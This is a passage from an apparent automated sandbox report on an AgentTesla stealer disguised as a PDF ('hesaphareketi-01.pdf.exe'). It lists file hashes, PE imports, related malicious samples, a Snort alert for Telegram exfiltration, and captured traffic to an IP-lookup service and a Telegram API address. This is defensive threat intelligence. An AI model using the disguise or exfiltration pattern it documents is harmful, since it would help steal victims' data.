                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            01:41:25API Interceptor10662819x Sleep call for process: RegAsm.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            149.154.167.220S28BW-420120416270,pdf.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                              Dextron Group PO.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                Wgdebahewafthr.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, zgRATBrowse
                                  sipari#U015f_comfirmasyonu.exeGet hashmaliciousAgentTeslaBrowse
                                    Documents Of DHL -BL- AWB- 8976453410.exeGet hashmaliciousAgentTeslaBrowse
                                      COMMERCIAL INVOICE - BL - AWB 7032805642.exeGet hashmaliciousAgentTeslaBrowse
                                        Doc0781123608.exeGet hashmaliciousAgentTesla, PureLog Stealer, XWormBrowse
                                          ordinul de cotatie.exeGet hashmaliciousAgentTeslaBrowse
                                            SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exeGet hashmaliciousAsyncRAT, DcRat, StormKitty, VenomRATBrowse
                                              RFQ-101432620247fl#U00e2#U00aexslx.exeGet hashmaliciousAgentTeslaBrowse
                                                104.26.13.205ReturnLegend.exeGet hashmaliciousStealitBrowse
                                                • api.ipify.org/?format=json
                                                SecuriteInfo.com.Trojan.DownLoaderNET.960.9931.28151.exeGet hashmaliciousPureLog Stealer, Targeted RansomwareBrowse
                                                • api.ipify.org/
                                                Sky-Beta-Setup.exeGet hashmaliciousStealitBrowse
                                                • api.ipify.org/?format=json
                                                ArenaWarSetup.exeGet hashmaliciousStealitBrowse
                                                • api.ipify.org/?format=json
                                                Sky-Beta Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                • api.ipify.org/?format=json
                                                E4sbo4F6Sz.exeGet hashmaliciousUnknownBrowse
                                                • api.ipify.org/
                                                E4sbo4F6Sz.exeGet hashmaliciousUnknownBrowse
                                                • api.ipify.org/
                                                SecuriteInfo.com.Win64.RATX-gen.31127.4101.exeGet hashmaliciousPureLog Stealer, Targeted RansomwareBrowse
                                                • api.ipify.org/

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                api.ipify.orgPayment For order details .exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, zgRATBrowse
                                                • 104.26.12.205
                                                SIEMENS #2427021-S06564.exeGet hashmaliciousAgentTeslaBrowse
                                                • 104.26.12.205
                                                https://shop.ketochow.xyz/Get hashmaliciousUnknownBrowse
                                                • 104.26.12.205
                                                http://5fgfggfgfg4g4h4.blogspot.mk/Get hashmaliciousUnknownBrowse
                                                • 104.26.13.205
                                                https://lely-cake.oujwe.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                • 104.26.12.205
                                                https://mantaairdrop-czw.pages.dev/Get hashmaliciousUnknownBrowse
                                                • 104.26.13.205
                                                https://greettive-ke-78374.pages.dev/help/contact/806883007383956Get hashmaliciousUnknownBrowse
                                                • 172.67.74.152
                                                044f.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                • 104.26.12.205
                                                hesaphareketi-.exeGet hashmaliciousAgentTeslaBrowse
                                                • 104.26.12.205
                                                Documents Of DHL -BL- AWB- 8976453410.exeGet hashmaliciousAgentTeslaBrowse
                                                • 172.67.74.152
                                                api.telegram.orgDextron Group PO.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                • 149.154.167.220
                                                Wgdebahewafthr.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, zgRATBrowse
                                                • 149.154.167.220
                                                sipari#U015f_comfirmasyonu.exeGet hashmaliciousAgentTeslaBrowse
                                                • 149.154.167.220
                                                Documents Of DHL -BL- AWB- 8976453410.exeGet hashmaliciousAgentTeslaBrowse
                                                • 149.154.167.220
                                                COMMERCIAL INVOICE - BL - AWB 7032805642.exeGet hashmaliciousAgentTeslaBrowse
                                                • 149.154.167.220
                                                Doc0781123608.exeGet hashmaliciousAgentTesla, PureLog Stealer, XWormBrowse
                                                • 149.154.167.220
                                                ordinul de cotatie.exeGet hashmaliciousAgentTeslaBrowse
                                                • 149.154.167.220
                                                SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exeGet hashmaliciousAsyncRAT, DcRat, StormKitty, VenomRATBrowse
                                                • 149.154.167.220
                                                RFQ-101432620247fl#U00e2#U00aexslx.exeGet hashmaliciousAgentTeslaBrowse
                                                • 149.154.167.220

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                TELEGRAMRUhttp://simxtrackredirecttszz.pages.dev/Get hashmaliciousUnknownBrowse
                                                • 149.154.167.99
                                                https://teiegam.org/Get hashmaliciousUnknownBrowse
                                                • 149.154.167.99
                                                S28BW-420120416270,pdf.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                • 149.154.167.220
                                                Dextron Group PO.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                • 149.154.167.220
                                                Wgdebahewafthr.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, zgRATBrowse
                                                • 149.154.167.220
                                                sipari#U015f_comfirmasyonu.exeGet hashmaliciousAgentTeslaBrowse
                                                • 149.154.167.220
                                                Documents Of DHL -BL- AWB- 8976453410.exeGet hashmaliciousAgentTeslaBrowse
                                                • 149.154.167.220
                                                COMMERCIAL INVOICE - BL - AWB 7032805642.exeGet hashmaliciousAgentTeslaBrowse
                                                • 149.154.167.220
                                                Doc0781123608.exeGet hashmaliciousAgentTesla, PureLog Stealer, XWormBrowse
                                                • 149.154.167.220
                                                ordinul de cotatie.exeGet hashmaliciousAgentTeslaBrowse
                                                • 149.154.167.220
                                                CLOUDFLARENETUShttps://pub-a2527e0fc1774b399011ecd14755d452.r2.dev/0nlinedoc.htmlGet hashmaliciousHTMLPhisherBrowse
                                                • 104.18.3.35
                                                Payment For order details .exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, zgRATBrowse
                                                • 104.26.12.205
                                                Offer Document 23.lnkGet hashmaliciousFormBookBrowse
                                                • 23.227.38.74
                                                Items.xlsGet hashmaliciousUnknownBrowse
                                                • 104.21.47.128
                                                SIEMENS #2427021-S06564.exeGet hashmaliciousAgentTeslaBrowse
                                                • 104.26.12.205
                                                seznam objedn#U00e1vek-405598204.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 188.114.96.3
                                                Items.xlsGet hashmaliciousUnknownBrowse
                                                • 172.67.171.37
                                                1d#U0422.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 188.114.96.3
                                                Items.xlsGet hashmaliciousUnknownBrowse
                                                • 188.114.97.3
                                                ArOuryf0GL.rtfGet hashmaliciousAgentTeslaBrowse
                                                • 104.17.64.14

                                                JA3 Fingerprints

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                3b5074b1b5d032e5620f69f9f700ff0ePayment For order details .exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, zgRATBrowse
                                                • 149.154.167.220
                                                • 104.26.13.205
                                                SIEMENS #2427021-S06564.exeGet hashmaliciousAgentTeslaBrowse
                                                • 149.154.167.220
                                                • 104.26.13.205
                                                seznam objedn#U00e1vek-405598204.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 149.154.167.220
                                                • 104.26.13.205
                                                1d#U0422.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 149.154.167.220
                                                • 104.26.13.205
                                                SecuriteInfo.com.W32.ABRisk.VTZE-2830.26480.4550.exeGet hashmaliciousUnknownBrowse
                                                • 149.154.167.220
                                                • 104.26.13.205
                                                SecuriteInfo.com.W32.ABRisk.VTZE-2830.26480.4550.exeGet hashmaliciousUnknownBrowse
                                                • 149.154.167.220
                                                • 104.26.13.205
                                                Updater.lnkGet hashmaliciousUnknownBrowse
                                                • 149.154.167.220
                                                • 104.26.13.205
                                                UNIDAD JUDICIAL PENAL ACTIVA A SU NOMBRE ACTA PERSONAL USTED HA SIDO NOTIFICADO.exeGet hashmaliciousUnknownBrowse
                                                • 149.154.167.220
                                                • 104.26.13.205
                                                UNIDAD JUDICIAL PENAL ACTIVA A SU NOMBRE ACTA PERSONAL USTED HA SIDO NOTIFICADO.exeGet hashmaliciousUnknownBrowse
                                                • 149.154.167.220
                                                • 104.26.13.205
                                                https://qrco.de/n8mxa4i5VHuJk4PMwkLpvyNqgwLBQ0Sb/?zwphvtjquqnl/pub/cc?_ri_=X0Gzc2X%3DAQpglLjHJlYQGXHi3ygqqrREEgoSeza8UICjjze1whbSsXnwpzgE8gG5CszbXAjhO3FqKUWVXtpKX%3DUYRTAADY&_ei_=EM6hiIRZ6IbTRQzpp7EgfWDv5wmb7wtZr_HKt4Y9565l73Y_PqZSaCEhvHs0mzNqB-gBgO3tuO3UzGxLd8-XUq76ZMc933xI6KE-OcN9i_7_vZ1nKFQzNpaL4RiL4mq9EVgUJPIQMWCvlw3G0w1CjXYcIG-BSVUdKxTJ-nET9bFyCwB2_dByO9r2C-jKzARF7AriZjx_pk4nCrXsqa5CQmpAUkWEc-dfHJ9wX73GWCpfF57_v_ES7Af2szUwfyD1crCX8fOSqjBUZSUnMozbxe4aYYiNhDFxL-2jMKdpABJE3vtt_geGts7n8Xf4EYbq7j3d_IMY4o8Q72577S1E3LPhYqvKvmKbTUvvnIMLzsO6OHpvMQd9_ppOuzIIivn9ZEfO3rb9O9j_duNb3MRYEYBN-0s24zFn151NBJlyD6Gq-MjdBvSKqeeKbw5Wfsj_VyMcrEbHNU3N-Fwk31llQYD9Y_KwimheCdKUAFPtoMQQev1yIcv8hHULCmqh0T1-CEH0F10XlSOydOFp_GyqRNIoG2OjudzyH2-uSleZsarzjYlowPA825PtI7w6EzQlva8d5pko8MVh5GhEP_jIa45zP_XmcMGT6AurPE-K2-xcw0R3fJdeI2HLvwr04_2EB8cEsQvXASU8ndzsHdI_YoX-pNX-DGKMx-6o7E8ijo1A4IQu6extYnY-yNU8Vt-z9xT3l2_ybVcDcwUj0ZQbN2JWPhpiuk8AtxJGzNnIrb4fD-PiJQXEveDyN7N9WsWB0Lg4So4GVp3wT2J2c8BxTsaHBlF99Acrgm9dCZjD_F51LbRK0LCxQjX-tsn4QuELhVAmkIDb_mIoHBFMG6pvRiLCwd_1KWrY31qzwPtEFzqzLUjtacn_BU8V3jK4bE2aqaNyrQaB0oaSFT5kgpAzuJ_iH7j8LpQz0TQLZ4tmiAQeKYiG_FGPh3KXElLE7DkhVTs0Oi8Q6tLs6smyQq4eF3hLlTnnZgSTePsTLxmDzrSw-KGeDyW2LkOZ4kbkxvCGN6seSt91qJ5eDDYhrv3-FjtktxugKzF7yfbej64mQyq1x75cGd6er7nAEMPG28MGLOx9idu5hHS8xpH3XiKhrSQQ3YC3jWQ8qY-EF-Q0TcdwfOj9V-oeOy0KZ-xAMn4XoAuVsYtm7dInk0l0GcUOHwbLnVpy8vKxcHhomXAYRvCzxOe9DPAf3WyCg16exynSJ7tVWJIJA2HKvQ30Pkd9jo8ww7nT6bHa-kCAU5sP0R60XwbaOD1Va5lezql219BRJKOoQC3Ce2b6YAtmFxpVQCXmavy8ISfNPYLP7iYDoR3ywadCKdxWiaVT52gr.&_di_=auf9n3qge530sjoc9a8mlfu4dl79cq7siqsd7tr5omthg3894hpgGet hashmaliciousUnknownBrowse
                                                • 149.154.167.220
                                                • 104.26.13.205

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                No created / dropped files found

                                                Static File Info

                                                General

                                                File type:PE32+ executable (console) x86-64, for MS Windows
                                                Entropy (8bit):7.009149672773074
                                                TrID:
                                                • Win64 Executable Console (202006/5) 92.65%
                                                • Win64 Executable (generic) (12005/4) 5.51%
                                                • Generic Win/DOS Executable (2004/3) 0.92%
                                                • DOS Executable Generic (2002/1) 0.92%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:hesaphareketi-01.pdf.exe
                                                File size:2'066'432 bytes
                                                MD5:8f184daf4d3d0fac93db93c798e616ed
                                                SHA1:f8c6c99b7e0572347ed1bee3ddb425e31f6cb643
                                                SHA256:97fa9df0ae7536db7c2427ff65ba51db3bbd22ebe957bf406ebe3f4ba4a46f7f
                                                SHA512:652d87c3ce83e960f3aa0edc2b16d8003b8b8a52d6025afb2818303b2d92ea4d123f3269249b751dff3d421ba46f9460d0d3c48be826808bfe4eaae9be21cd3e
                                                SSDEEP:24576:8ynjN3fi9dEoZR814OEQjls30eTFxmT4i8eMOq52AOXuq01dKqOFFSyF8FaE:9jN3CdJ81nEQhs30eouqsrOFXOaE
                                                TLSH:52A5B005A3F801E4E46BC634CA599733D3B1B41A1730E58B0A5AD7922F73EE15BBF612
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6c.IW._IW._IW._O..^EW._O..^XW._O..^gW._@/._GW._./.^BW._IW._IV._.+.^BW._.+.^.W._IW._KW._#..^HW._#.._HW._#..^HW._RichIW._.......

                                                File Icon

                                                Icon Hash:00928e8e8686b000

                                                Static PE Info

                                                General

                                                Entrypoint:0x140068d5c
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x140000000
                                                Subsystem:windows cui
                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x664E7376 [Wed May 22 22:36:38 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:6
                                                OS Version Minor:0
                                                File Version Major:6
                                                File Version Minor:0
                                                Subsystem Version Major:6
                                                Subsystem Version Minor:0
                                                Import Hash:79856d4b034c49dc3dd3e403b25b6bbf

                                                Entrypoint Preview

                                                Instruction
                                                dec eax
                                                sub esp, 28h
                                                call 00007FE618D6D65Ch
                                                dec eax
                                                add esp, 28h
                                                jmp 00007FE618D6CF57h
                                                int3
                                                int3
                                                inc eax
                                                push ebx
                                                dec eax
                                                sub esp, 20h
                                                dec eax
                                                mov ebx, ecx
                                                jmp 00007FE618D6D0F1h
                                                dec eax
                                                mov ecx, ebx
                                                call 00007FE618D75795h
                                                test eax, eax
                                                je 00007FE618D6D0F5h
                                                dec eax
                                                mov ecx, ebx
                                                call 00007FE618D6CE07h
                                                dec eax
                                                test eax, eax
                                                je 00007FE618D6D0C9h
                                                dec eax
                                                add esp, 20h
                                                pop ebx
                                                ret
                                                dec eax
                                                cmp ebx, FFFFFFFFh
                                                je 00007FE618D6D0E8h
                                                call 00007FE618D6DAECh
                                                int3
                                                call 00007FE618D6DB06h
                                                int3
                                                jmp 00007FE618D6DB34h
                                                int3
                                                int3
                                                int3
                                                jmp 00007FE618D6D19Ch
                                                int3
                                                int3
                                                int3
                                                dec eax
                                                sub esp, 28h
                                                dec ebp
                                                mov eax, dword ptr [ecx+38h]
                                                dec eax
                                                mov ecx, edx
                                                dec ecx
                                                mov edx, ecx
                                                call 00007FE618D6D0F2h
                                                mov eax, 00000001h
                                                dec eax
                                                add esp, 28h
                                                ret
                                                int3
                                                int3
                                                int3
                                                inc eax
                                                push ebx
                                                inc ebp
                                                mov ebx, dword ptr [eax]
                                                dec eax
                                                mov ebx, edx
                                                inc ecx
                                                and ebx, FFFFFFF8h
                                                dec esp
                                                mov ecx, ecx
                                                inc ecx
                                                test byte ptr [eax], 00000004h
                                                dec esp
                                                mov edx, ecx
                                                je 00007FE618D6D0F5h
                                                inc ecx
                                                mov eax, dword ptr [eax+08h]
                                                dec ebp
                                                arpl word ptr [eax+04h], dx
                                                neg eax
                                                dec esp
                                                add edx, ecx
                                                dec eax
                                                arpl ax, cx
                                                dec esp
                                                and edx, ecx
                                                dec ecx
                                                arpl bx, ax
                                                dec edx
                                                mov edx, dword ptr [eax+edx]
                                                dec eax
                                                mov eax, dword ptr [ebx+10h]
                                                mov ecx, dword ptr [eax+08h]
                                                dec eax
                                                mov eax, dword ptr [ebx+08h]
                                                test byte ptr [ecx+eax+03h], 0000000Fh
                                                je 00007FE618D6D0EDh
                                                movzx eax, byte ptr [ecx+eax+00h]

                                                Rich Headers

                                                Programming Language:
                                                • [IMP] VS2008 SP1 build 30729

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x1f79a00x58.rdata
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x1f79f80xf0.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x21d0000x3b150.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x2080000x1314c.pdata
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x2590000x634.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x1ca3700x1c.rdata
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x1ca5000x28.rdata
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1ca2300x140.rdata
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x17d0000x778.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x71a880x71c005cdd54da137ec06542526019b1031732False0.4528288118131868data6.6410813091638IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .managed0x730000xb91680xb92002d30634d2eb96982ab12a2d431b95020False0.4601620526671168data6.463570386679756IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                hydrated0x12d0000x4f8080x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rdata0x17d0000x7c4de0x7c600f3ba60da94e9809a9aa5de6dd815cadaFalse0.469921875data6.575390299832166IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0x1fa0000xdc900x22005c15d417ed4d359d82911c50efdabf9aFalse0.23793658088235295data3.6721787513471362IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .pdata0x2080000x1314c0x132008cc774a948808419be7ca4f4b39fb78dFalse0.4887280433006536data6.17164551981099IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                _RDATA0x21c0000x1f40x200cfc28b4453f40f4f91f4a52e36529a97False0.5078125data4.172727899540164IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .rsrc0x21d0000x3b1500x3b200bbfbc02d9cc634be31885274c1e9d08cFalse0.9963167283298098data7.997686186749214IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0x2590000x6340x8008b35b44373572aa9287a6c541ff3e534False0.48681640625data4.726579003687373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                BINARY0x21d12c0x3aa84data1.000337134770665
                                                RT_VERSION0x257bb00x3b4data0.35337552742616035
                                                RT_MANIFEST0x257f640x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                Imports

                                                DLLImport
                                                ADVAPI32.dllRegCloseKey, RegEnumKeyExW, RegEnumValueW, RegOpenKeyExW, RegQueryValueExW, RegSetValueExW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegSetValueExA, GetTokenInformation, DuplicateTokenEx, OpenThreadToken, RevertToSelf, ImpersonateLoggedOnUser, CheckTokenMembership, EventWrite, EventRegister, EventEnabled
                                                bcrypt.dllBCryptGenRandom, BCryptEncrypt, BCryptDecrypt, BCryptImportKey, BCryptOpenAlgorithmProvider, BCryptSetProperty, BCryptCloseAlgorithmProvider, BCryptDestroyKey
                                                KERNEL32.dllTlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, EncodePointer, RaiseException, RtlPcToFileHeader, CloseThreadpoolIo, GetStdHandle, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToSystemTime, GetSystemTime, GetCalendarInfoEx, CompareStringOrdinal, CompareStringEx, FindNLSStringEx, GetLocaleInfoEx, ResolveLocaleName, GetUserPreferredUILanguages, FindStringOrdinal, GetTickCount64, GetCurrentProcess, GetCurrentThread, Sleep, InitializeCriticalSection, InitializeConditionVariable, DeleteCriticalSection, LocalFree, EnterCriticalSection, SleepConditionVariableCS, LeaveCriticalSection, WakeConditionVariable, QueryPerformanceCounter, WaitForMultipleObjectsEx, GetLastError, QueryPerformanceFrequency, SetLastError, GetFullPathNameW, GetLongPathNameW, MultiByteToWideChar, WideCharToMultiByte, LocalAlloc, GetConsoleOutputCP, GetProcAddress, RaiseFailFastException, CreateThreadpoolIo, StartThreadpoolIo, CancelThreadpoolIo, LocaleNameToLCID, LCMapStringEx, EnumTimeFormatsEx, EnumCalendarInfoExEx, CopyFileExW, CreateFileW, DeleteFileW, DeviceIoControl, ExpandEnvironmentStringsW, FindClose, FindFirstFileExW, FlushFileBuffers, FreeLibrary, GetFileAttributesExW, GetFileInformationByHandleEx, GetFileType, GetModuleFileNameW, GetOverlappedResult, GetSystemDirectoryW, LoadLibraryExW, ReadFile, SetFileInformationByHandle, SetThreadErrorMode, GetDynamicTimeZoneInformation, GetTimeZoneInformation, WriteFile, GetCurrentProcessorNumberEx, CloseHandle, SetEvent, CreateEventExW, GetEnvironmentVariableW, FormatMessageW, DuplicateHandle, GetThreadPriority, SetThreadPriority, GetConsoleMode, WriteConsoleW, GetExitCodeProcess, TerminateProcess, OpenProcess, K32EnumProcesses, GetProcessId, CreateProcessA, GetConsoleWindow, FreeConsole, AllocConsole, VirtualAllocEx, ResumeThread, CreateProcessW, GetThreadContext, SetThreadContext, FlushProcessWriteBuffers, GetCurrentThreadId, WaitForSingleObjectEx, VirtualQuery, RtlRestoreContext, AddVectoredExceptionHandler, FlsAlloc, FlsGetValue, FlsSetValue, CreateEventW, SwitchToThread, CreateThread, SuspendThread, FlushInstructionCache, VirtualAlloc, VirtualProtect, VirtualFree, QueryInformationJobObject, GetModuleHandleW, GetModuleHandleExW, GetProcessAffinityMask, InitializeContext, GetEnabledXStateFeatures, SetXStateFeaturesMask, InitializeCriticalSectionEx, GetSystemTimeAsFileTime, ResetEvent, DebugBreak, WaitForSingleObject, SleepEx, GlobalMemoryStatusEx, GetSystemInfo, GetLogicalProcessorInformation, GetLogicalProcessorInformationEx, GetLargePageMinimum, VirtualUnlock, VirtualAllocExNuma, IsProcessInJob, GetNumaHighestNodeNumber, GetProcessGroupAffinity, K32GetProcessMemoryInfo, RtlUnwindEx, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, InitializeSListHead, GetCurrentProcessId
                                                ole32.dllCoUninitialize, CoTaskMemAlloc, CoGetApartmentType, CoCreateGuid, CoTaskMemFree, CoWaitForMultipleHandles, CoInitializeEx
                                                USER32.dllLoadStringW
                                                api-ms-win-crt-math-l1-1-0.dllpow, modf, ceil, __setusermatherr
                                                api-ms-win-crt-heap-l1-1-0.dllcalloc, malloc, _callnewh, _set_new_mode, free
                                                api-ms-win-crt-string-l1-1-0.dllwcsncmp, strncpy_s, _stricmp, strcpy_s, strcmp, _wcsicmp
                                                api-ms-win-crt-runtime-l1-1-0.dll_c_exit, _register_thread_local_exe_atexit_callback, _get_initial_wide_environment, _cexit, __p___wargv, __p___argc, _exit, exit, _initterm_e, _initterm, terminate, _crt_atexit, _initialize_wide_environment, _configure_wide_argv, _register_onexit_function, _initialize_onexit_table, _set_app_type, _seh_filter_exe, abort
                                                api-ms-win-crt-stdio-l1-1-0.dll__stdio_common_vsprintf_s, __stdio_common_vsscanf, __stdio_common_vfprintf, __acrt_iob_func, _set_fmode, __p__commode
                                                api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale

                                                Exports

                                                NameOrdinalAddress
                                                DotNetRuntimeDebugHeader10x1401fb360

                                                Network Behavior

                                                Snort IDS Alerts

                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                05/24/24-07:41:27.363485TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49700443192.168.2.7149.154.167.220

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                May 24, 2024 07:41:23.924833059 CEST49699443192.168.2.7104.26.13.205
                                                May 24, 2024 07:41:23.924913883 CEST44349699104.26.13.205192.168.2.7
                                                May 24, 2024 07:41:23.925071001 CEST49699443192.168.2.7104.26.13.205
                                                May 24, 2024 07:41:23.934068918 CEST49699443192.168.2.7104.26.13.205
                                                May 24, 2024 07:41:23.934109926 CEST44349699104.26.13.205192.168.2.7
                                                May 24, 2024 07:41:24.427206993 CEST44349699104.26.13.205192.168.2.7
                                                May 24, 2024 07:41:24.430510998 CEST49699443192.168.2.7104.26.13.205
                                                May 24, 2024 07:41:24.433792114 CEST49699443192.168.2.7104.26.13.205
                                                May 24, 2024 07:41:24.433804035 CEST44349699104.26.13.205192.168.2.7
                                                May 24, 2024 07:41:24.434262991 CEST44349699104.26.13.205192.168.2.7
                                                May 24, 2024 07:41:24.484770060 CEST49699443192.168.2.7104.26.13.205
                                                May 24, 2024 07:41:24.550529003 CEST49699443192.168.2.7104.26.13.205
                                                May 24, 2024 07:41:24.594496012 CEST44349699104.26.13.205192.168.2.7
                                                May 24, 2024 07:41:24.727719069 CEST44349699104.26.13.205192.168.2.7
                                                May 24, 2024 07:41:24.727797985 CEST44349699104.26.13.205192.168.2.7
                                                May 24, 2024 07:41:24.727855921 CEST49699443192.168.2.7104.26.13.205
                                                May 24, 2024 07:41:24.762111902 CEST49699443192.168.2.7104.26.13.205
                                                May 24, 2024 07:41:26.351636887 CEST49700443192.168.2.7149.154.167.220
                                                May 24, 2024 07:41:26.351670027 CEST44349700149.154.167.220192.168.2.7
                                                May 24, 2024 07:41:26.351743937 CEST49700443192.168.2.7149.154.167.220
                                                May 24, 2024 07:41:26.356568098 CEST49700443192.168.2.7149.154.167.220
                                                May 24, 2024 07:41:26.356578112 CEST44349700149.154.167.220192.168.2.7
                                                May 24, 2024 07:41:27.039228916 CEST44349700149.154.167.220192.168.2.7
                                                May 24, 2024 07:41:27.039350033 CEST49700443192.168.2.7149.154.167.220
                                                May 24, 2024 07:41:27.043437004 CEST49700443192.168.2.7149.154.167.220
                                                May 24, 2024 07:41:27.043468952 CEST44349700149.154.167.220192.168.2.7
                                                May 24, 2024 07:41:27.044286013 CEST44349700149.154.167.220192.168.2.7
                                                May 24, 2024 07:41:27.045720100 CEST49700443192.168.2.7149.154.167.220
                                                May 24, 2024 07:41:27.086507082 CEST44349700149.154.167.220192.168.2.7
                                                May 24, 2024 07:41:27.363028049 CEST44349700149.154.167.220192.168.2.7
                                                May 24, 2024 07:41:27.363426924 CEST49700443192.168.2.7149.154.167.220
                                                May 24, 2024 07:41:27.363440037 CEST44349700149.154.167.220192.168.2.7
                                                May 24, 2024 07:41:27.546787024 CEST44349700149.154.167.220192.168.2.7
                                                May 24, 2024 07:41:27.554105043 CEST44349700149.154.167.220192.168.2.7
                                                May 24, 2024 07:41:27.554193020 CEST49700443192.168.2.7149.154.167.220
                                                May 24, 2024 07:41:27.561944962 CEST49700443192.168.2.7149.154.167.220
                                                May 24, 2024 07:43:04.491204023 CEST49707443192.168.2.7149.154.167.220
                                                May 24, 2024 07:43:04.491242886 CEST44349707149.154.167.220192.168.2.7
                                                May 24, 2024 07:43:04.491478920 CEST49707443192.168.2.7149.154.167.220
                                                May 24, 2024 07:43:04.491741896 CEST49707443192.168.2.7149.154.167.220
                                                May 24, 2024 07:43:04.491755962 CEST44349707149.154.167.220192.168.2.7
                                                May 24, 2024 07:43:05.140644073 CEST44349707149.154.167.220192.168.2.7
                                                May 24, 2024 07:43:05.153351068 CEST49707443192.168.2.7149.154.167.220
                                                May 24, 2024 07:43:05.153387070 CEST44349707149.154.167.220192.168.2.7
